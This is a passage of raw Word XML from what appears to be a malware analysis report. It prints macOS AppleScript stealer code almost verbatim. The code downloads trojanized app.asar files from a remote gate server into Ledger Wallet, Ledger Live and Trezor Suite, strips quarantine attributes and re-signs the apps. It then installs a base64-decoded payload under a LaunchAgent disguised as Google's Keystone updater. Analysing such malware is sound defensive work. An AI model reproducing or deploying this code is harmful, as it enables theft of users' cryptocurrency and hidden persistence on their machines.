          <w:p w14:paraId="16E8705F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"codesign -f -d -s - " &amp; quoted form of atomicPath</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E2B987E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debugLog("Atomic: injection OK")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19860B84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if</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46749674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"rm -f " &amp; quoted form of tempZip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01BCAF45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on error errMsg</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E9C9659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debugLog("Atomic: injection FAIL | " &amp; errMsg)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1840BB9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try</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06693F84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if</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EB64C26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ledgerPath to "/Applications/Ledger Wallet.app"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02941331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if (do shell script "test -d " &amp; quoted form of ledgerPath &amp; " &amp;&amp; echo 1 || echo 0") is "1" then</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05B0F9EC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debugLog("Ledger Wallet FOUND at " &amp; ledgerPath &amp; ", injecting...")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71709246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try</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06A87978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asarUrl to gateUrl &amp; "/ledger-asar"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0848ADF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tempZip to "/tmp/ledger_asar.zip"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67468723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tempAsar to "/tmp/app.asar"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17BB4294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tempPlist to "/tmp/Info.plist"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05F5DAB9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"curl -s -o " &amp; quoted form of tempZip &amp; " " &amp; quoted form of asarUrl</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43D48C1A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"unzip -q -o " &amp; quoted form of tempZip &amp; " -d /tmp"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C0F9152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if (do shell script "test -f " &amp; quoted form of tempAsar &amp; " &amp;&amp; echo 1 || echo 0") is "1" then</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C46C265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lastRenderedPageBreak/>
              <w:t>do shell script "pkill -9 'Ledger Wallet' 2&gt;/dev/null || true"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="119C5ABC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delay 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3651A10F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ledgerResources to "/Applications/Ledger Wallet.app/Contents/Resources"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="749C903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targetAsar to ledgerResources &amp; "/app.asar"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35559108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targetPlist to "/Applications/Ledger Wallet.app/Contents/Info.plist"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EA9ADE8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"cp -rf " &amp; quoted form of ledgerPath &amp; " /tmp/Ledger_tmp.app"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E817A7E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"rm -rf " &amp; quoted form of ledgerPath</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08450C1E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"mv /tmp/Ledger_tmp.app " &amp; quoted form of ledgerPath</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BEE944B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"mv " &amp; quoted form of tempAsar &amp; " " &amp; quoted form of targetAsar</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ABBE054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if (do shell script "test -f " &amp; quoted form of tempPlist &amp; " &amp;&amp; echo 1 || echo 0") is "1" then</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4499E39C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"mv " &amp; quoted form of tempPlist &amp; " " &amp; quoted form of targetPlist</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EBDC37E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if</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3101A13A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"xattr -cr " &amp; quoted form of ledgerPath</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2692E97E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"codesign -f -d -s - " &amp; quoted form of ledgerPath</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D143BD2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debugLog("Ledger Wallet: injection OK")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C47D835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if</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B3E38E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"rm -f " &amp; quoted form of tempZip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D19D2FB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on error errMsg</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32BFB19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debugLog("Ledger Wallet: injection FAIL | " &amp; errMsg)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F0CAF7D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try</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24B5531C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if</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B422705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ledgerLivePath to "/Applications/Ledger Live.app"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13DFE075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if (do shell script "test -d " &amp; quoted form of ledgerLivePath &amp; " &amp;&amp; echo 1 || echo 0") is "1" then</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EB2A2BA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debugLog("Ledger Live FOUND at " &amp; ledgerLivePath &amp; ", injecting...")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7619723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try</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="493F8E1C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asarUrl to gateUrl &amp; "/ledgerlive-asar"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="263B91D4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tempZip to "/tmp/ledger_live_asar.zip"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56563AB2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tempAsar to "/tmp/app.asar"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45169FD9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tempPlist to "/tmp/Info.plist"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FFF11DD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"curl -s -o " &amp; quoted form of tempZip &amp; " " &amp; quoted form of asarUrl</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="475D1072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"unzip -q -o " &amp; quoted form of tempZip &amp; " -d /tmp"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="584CB1FD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if (do shell script "test -f " &amp; quoted form of tempAsar &amp; " &amp;&amp; echo 1 || echo 0") is "1" then</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1155292E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"pkill -9 'Ledger Live' 2&gt;/dev/null || true"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B197D44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delay 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BE74BFA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ledgerLiveResources to "/Applications/Ledger Live.app/Contents/Resources"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="235AB174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targetAsar to ledgerLiveResources &amp; "/app.asar"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69567DBD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targetPlist to "/Applications/Ledger Live.app/Contents/Info.plist"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3622AA41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"cp -rf " &amp; quoted form of ledgerLivePath &amp; " /tmp/LedgerLive_tmp.app"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AEA5D59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"rm -rf " &amp; quoted form of ledgerLivePath</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C0C021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"mv /tmp/LedgerLive_tmp.app " &amp; quoted form of ledgerLivePath</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33B8EF44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lastRenderedPageBreak/>
              <w:t>do shell script "mv " &amp; quoted form of tempAsar &amp; " " &amp; quoted form of targetAsar</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58BFE569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if (do shell script "test -f " &amp; quoted form of tempPlist &amp; " &amp;&amp; echo 1 || echo 0") is "1" then</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54D0C196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"mv " &amp; quoted form of tempPlist &amp; " " &amp; quoted form of targetPlist</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="679F8C8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if</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EDF0C9A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"xattr -cr " &amp; quoted form of ledgerLivePath</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DF36FEB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"codesign -f -d -s - " &amp; quoted form of ledgerLivePath</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F1993DC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debugLog("Ledger Live: injection OK")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="134A6B1E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if</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28FC0BAE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"rm -f " &amp; quoted form of tempZip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6858EB60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on error errMsg</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="364AA18F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debugLog("Ledger Live: injection FAIL | " &amp; errMsg)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6824C310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try</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="655C2E0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if</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C5EADFE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trezorPath to "/Applications/Trezor Suite.app"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7745AEE1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if (do shell script "test -d " &amp; quoted form of trezorPath &amp; " &amp;&amp; echo 1 || echo 0") is "1" then</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4752E420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debugLog("Trezor Suite FOUND at " &amp; trezorPath &amp; ", injecting...")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5206792A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try</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D631C6B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asarUrl to gateUrl &amp; "/trezor-asar"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E461EBF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tempZip to "/tmp/trezor_asar.zip"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2316521E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tempAsar to "/tmp/app.asar"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A58FC60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"curl -s -o " &amp; quoted form of tempZip &amp; " " &amp; quoted form of asarUrl</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32D6C08C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"unzip -q -o " &amp; quoted form of tempZip &amp; " -d /tmp"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73A5943F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if (do shell script "test -f " &amp; quoted form of tempAsar &amp; " &amp;&amp; echo 1 || echo 0") is "1" then</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3235297A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"pkill -9 'Trezor Suite' 2&gt;/dev/null || true"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C84F913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delay 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="545419E1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trezorResources to "/Applications/Trezor Suite.app/Contents/Resources"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3971AD9F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set targetAsar to trezorResources &amp; "/app.asar"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="591E8148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"cp -rf " &amp; quoted form of trezorPath &amp; " /tmp/Trezor_tmp.app"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02527CCE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"rm -rf " &amp; quoted form of trezorPath</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="318A8F8D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"mv /tmp/Trezor_tmp.app " &amp; quoted form of trezorPath</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BB1EE37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"mv " &amp; quoted form of tempAsar &amp; " " &amp; quoted form of targetAsar</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="640C843A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"xattr -cr " &amp; quoted form of trezorPath</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F399384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"codesign -f -d -s - " &amp; quoted form of trezorPath</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EDCFEC0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debugLog("Trezor: injection OK")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F25F6C0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if</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E77E5E9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do shell script "rm -f " &amp; quoted form of tempZip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38BC0465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on error errMsg</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20016DFC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debugLog("Trezor: injection FAIL | " &amp; errMsg)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71E52779" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRP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try</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10E5C6E8" w14:textId="7F283F5E" w:rsidR="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001E1C20">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>end if</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56C9479C" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CBF95BD" w14:textId="2795E848" w:rsidR="00ED3191" w:rsidRDefault="00973837" w:rsidP="00973837">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Persistence: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3837" w14:paraId="6C060480" w14:textId="77777777" w:rsidTr="00973837">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="788AC5F9" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>debugLog("--- PERSISTENCE ---")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ED9E913" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>set persistDir to (POSIX path of (path to home folder)) &amp; "Library/Application Support/Google/"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08CF7544" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>set appDir to persistDir &amp; "GoogleUpdate.app/Contents/MacOS/"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19D272D2" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>set plistDir to (POSIX path of (path to home folder)) &amp; "Library/LaunchAgents/"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="398B8FD9" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>debugLog("Persistence: script -&gt; " &amp; appDir &amp; "GoogleUpdate")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A1A3C18" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>debugLog("Persistence: plist -&gt; " &amp; plistDir &amp; "com.google.keystone.agent.plist")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B802A68" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>try</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EE78869" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>do shell script "mkdir -p " &amp; quoted form of appDir</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3368F990" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>do shell script "mkdir -p " &amp; quoted form of plistDir</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D3AE5D9" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>set scriptPath to appDir &amp; "GoogleUpdate"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37909C2F" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>set plistPath to plistDir &amp; "com.google.keystone.agent.plist"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41C4958F" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>do shell script "echo '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' | base64 -d &gt; " &amp; quoted form of scriptPath</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DAA6AAA" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>do shell script "chmod +x " &amp; quoted form of scriptPath</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DCABBD1" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>set plistContent to "&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65944CBD" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>&lt;!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0550EC9E" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>&lt;plist version=\"1.0\"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C9229D7" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>&lt;dict&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E5BD8AC" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>&lt;key&gt;Label&lt;/key&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="049427D6" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>&lt;string&gt;com.google.keystone.agent&lt;/string&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42C8FF0E" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>&lt;key&gt;ProgramArguments&lt;/key&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33ED8C69" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>&lt;array&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B306732" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>&lt;string&gt;" &amp; scriptPath &amp; "&lt;/string&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AF3B4D7" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>&lt;/array&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="026D877B" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>&lt;key&gt;StartInterval&lt;/key&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EF33853" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>&lt;integer&gt;60&lt;/integer&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13C49C4D" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>&lt;key&gt;RunAtLoad&lt;/key&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78ACFFC6" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>&lt;true/&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FDD4BEA" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>&lt;key&gt;StandardOutPath&lt;/key&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07B60297" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>&lt;string&gt;/dev/null&lt;/string&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C8DFF45" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>&lt;key&gt;StandardErrorPath&lt;/key&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E86DE8C" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>&lt;string&gt;/dev/null&lt;/string&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37146AAA" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>&lt;/dict&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="254CD260" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>&lt;/plist&gt;"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F2F85D1" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>do shell script "echo " &amp; quoted form of plistContent &amp; " &gt; " &amp; quoted form of plistPath</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D2D6DB5" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>do shell script "launchctl unload " &amp; quoted form of plistPath &amp; " 2&gt;/dev/null || true"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42D676DF" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>do shell script "launchctl load " &amp; quoted form of plistPath</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="389B12BE" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>debugLog("Persistence: OK")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="302AD2AC" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>on error errMsg</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75E0ED8B" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>debugLog("Persistence: FAIL | " &amp; errMsg)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AADE3B9" w14:textId="692C986A" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
            <w:r>
              <w:t>end try</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4DB72A27" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="001E1C20"/>
    <w:p w14:paraId="4F1005D9" w14:textId="77777777" w:rsidR="00973837" w:rsidRDefault="00973837" w:rsidP="001E1C20"/>
    <w:p w14:paraId="5A647970" w14:textId="77777777" w:rsidR="00973837" w:rsidRPr="001E1C20" w:rsidRDefault="00973837" w:rsidP="001E1C20"/>
    <w:sectPr w:rsidR="00973837" w:rsidRPr="001E1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49B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B18E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013B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F58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52A8C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FA7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E09DC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="014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E554E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AD4E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20F53"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3EA00DE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687704"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4DB0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55D70"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="919E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E4EED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3166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855FB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="79E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403F2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="17CC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A31B2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="716C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A64EC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DE3AE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EB1861"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E188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2FDE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="49D002DA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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="37446995"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4FDACE0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37700C24"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="118EF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3C516B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9918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E70BA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E56C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962AA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B0A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45A21"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D9FE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8036B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="930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9763C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3DC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95916"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DD98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D2453"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="87D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6157E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="594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8060A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BBE0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25F47"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="05C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F23A3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B96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147276">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1293438532">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1906062920">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="703137191">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="451829089">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="23558503">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="530993322">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="250627956">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="871917241">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1673676703">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="2053575254">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1994679893">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1130785024">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1480925132">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="321085077">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1401833195">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1528980903">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1021472908">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="626543360">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1811093998">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1442262119">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="603614662">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1024014689">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="873035268">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1426804678">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="435100217">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="113597467">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1124426498">
    <w:abstractNumId w:val="15"/>
  </w:num>
